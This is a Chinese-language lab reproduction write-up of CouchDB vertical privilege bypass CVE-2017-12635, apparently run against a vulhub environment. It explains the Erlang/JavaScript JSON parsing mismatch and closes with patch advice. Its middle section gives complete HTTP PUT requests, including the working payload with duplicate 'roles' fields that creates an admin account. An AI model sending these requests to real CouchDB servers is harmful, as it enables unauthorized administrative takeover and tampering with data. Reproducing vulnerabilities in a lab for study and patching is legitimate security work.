Couchdb垂直权限绕过(CVE-2017-12635)

漏洞描述：

Apache CouchDB是一个开源数据库，专注于易用性和成为"完全拥抱web的数据库"。它是一个使用JSON作为存储格式，JavaScript作为查询语言，MapReduce和HTTP作为API的NoSQL数据库。应用广泛，如BBC用在其动态内容展示平台，Credit Suisse用在其内部的商品部门的市场框架，Meebo用在其社交平台（web和应用程序）。

在2017年11月15日，CVE-2017-12635和CVE-2017-12636披露，CVE-2017-12635是由于Erlang和JavaScript对JSON解析方式的不同，导致语句执行产生差异性导致的。这个漏洞可以让任意用户创建管理员，属于垂直权限绕过漏洞。版本小于1.7.0以及小于2.1.1都存在该漏洞。

复现过程：

1.访问http://ip:port，出现如下页面，开始实验

2.访问/_utils目录，进入登录页面

3.修改Host数据，并发送如下数据包,只有管理员才能设置Role角色

PUT /_users/org.couchdb.user:asd HTTP/1.1

Host: ip:port

Accept: */*

Accept-Language: en

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)

Connection: close

Content-Type: application/json

Content-Length: 94

{

  "type": "user",

  "name": "asd",

  "roles": ["_admin"],

  "password": "vulhub"

}

4.已创建的用户，修改密码的话，是不行的。

5.发送一次包含两个roles字段的数据包，即可绕过限制

注意：1、roles字段必须为空

PUT /_users/org.couchdb.user:vulhub HTTP/1.1

Host: ip:port

Accept: */*

Accept-Language: en

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)

Connection: close

Content-Type: application/json

Content-Length: 108

{

  "type": "user",

  "name": "vulhub",

  "roles": ["_admin"],

  "roles": [],

  "password": "vulhub"

}

6.输入注册的用户名和密码进行登录

借此漏洞，任意用户都可以创建管理员账户，对后台数据进行修改。

修复建议：

1.升级CouchDB的版本到1.7.1或2.1.1
2.配置HTTP API参数，针对敏感信息加入黑名单